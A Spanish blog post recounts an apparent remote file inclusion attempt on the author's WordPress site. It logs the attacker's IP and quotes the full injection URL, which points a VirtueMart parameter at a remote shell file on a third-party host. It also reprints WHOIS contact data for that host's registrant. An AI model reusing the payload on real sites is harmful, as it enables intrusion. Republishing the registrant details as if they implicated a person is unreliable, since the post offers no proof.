Intento de Ataque a Luctus!

El día 02-17-2010, a las  08:25 pm exactamente ésta web ha recibido un supuesto  intento de ataque (RFI?). Entre la gente que usamos WordPress, Joomla o cualquier otro portal dinámico con posibilidad a comentarios, aparecen de vez en cuando en nuestros paneles “comentarios” para aprobar aparentemente sin sentido, la mayoría de ellos son pruebas e intentos de inyección.  Por una parte éste intento de ataque es  gracioso pero insignificante, pero si que hay gente evaluando y desarrollando exploits de verdad  o inyecciones para versiones actuales.  Por otra parte nos contenta  que evaluen la seguridad de los servicios que usamos el público en general de cualquier manera posible, en mi caso (WordPress 2.9.1 + 000webhosting) pués así es como las empresas van mejorando sus softwares, productos y servicios en general.

La ip que  ha quedado Filtrada en nuestro sistema es:  (Para ello también existen plugins WordPress como visitors maps asi como para  Joomla y Drupal…)

78.110.50.121   (c19-w.ht-systems.ru)  Moscú

El intento de ataque ha sido este: (http://luctus.es/?p=298/components/com_virtuemart/*******_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt????) y se ha intentado realizar exactamente desde ésta variable:    http://luctus.es/?p=298/…

La dirección ip desde la cual se realizó el intento de ataque mediante  navegador web está bastante limpia y suponemos que no és un pc doméstico:

*Puerto 111 Activo (Sun Remote Procedure Call)

El exploit…shell o lo que fuera este id1.txt no ha funcionado,  sabemos que   se aloja aquí:    http://www.hochsauerlandferien.de/  y se llama id1.txt  (una c99…r57?, espero que si lees ésto no la retires de tu carepta pública)… así podremos realizar pruebas nosotros también con él.

Las shells se alojan en carpetas superiores  de ésta FAKE web (/nw/data/images/…), donde ni siquiera se han molestado en cambair el título del índex.  (Template)

La dirección Ip del server donde se aloja el exploit es:   212.12.114.89 y efectivamente buscando el mail googleando me he encontrado con ésta web donde queda registrado que  realizan ataques RFI (seguramente automatizados por redes que se dedican a ésto)…si para vosotros éstas situaciones son desagradables y queréis evitar los ataques automatizados usad Captcha en vuestros gestores de contenidoañadiendo alguno de los numerosos plugins que existen para ello, para el SPAM en WordPress normalmente tenemos Akismet de base, pero hay otros donde queda registrada la URL visitada por el visitante como su IP … y otros datos relevantes para el administrador del site, aunque ésto en realidad no solucione nada seguramente evita ciertos ataques automatizados.

Web registrada a nombre de:

Type:             PERSON
Name:             business-light
Address:          Neusser Strasse 122
Pcode:            41065
City:             Mönchengladbach
Country:          DE
Phone:            +49-2161-5494693
Fax:              +49-2161-5494692
Email:            info@business-light.com
Changed:          2006-08-31T16:32:06+02:00

[Zone-C]
Type:             PERSON
Name:             business-light
Address:          Neusser Strasse 122
Pcode:            41065
City:             Mönchengladbach
Country:          DE
Phone:            +49-2161-5494693
Fax:              +49-2161-5494692
Email:            info@business-light.com
Changed:          2006-08-31T16:32:06+02:00

Solo decirte... Que tal vez la próxima vez, puedes seguir intentándolo,
por nuestra parte no hay ningún tipo de inconveniente.

Tagged with: feelcomz • rfi • scaners

Fichero archivado: Noticias • Vulnerabilidades

Le gusto este articulo? Subscribete a mi RSS feed y obtener mas descargas!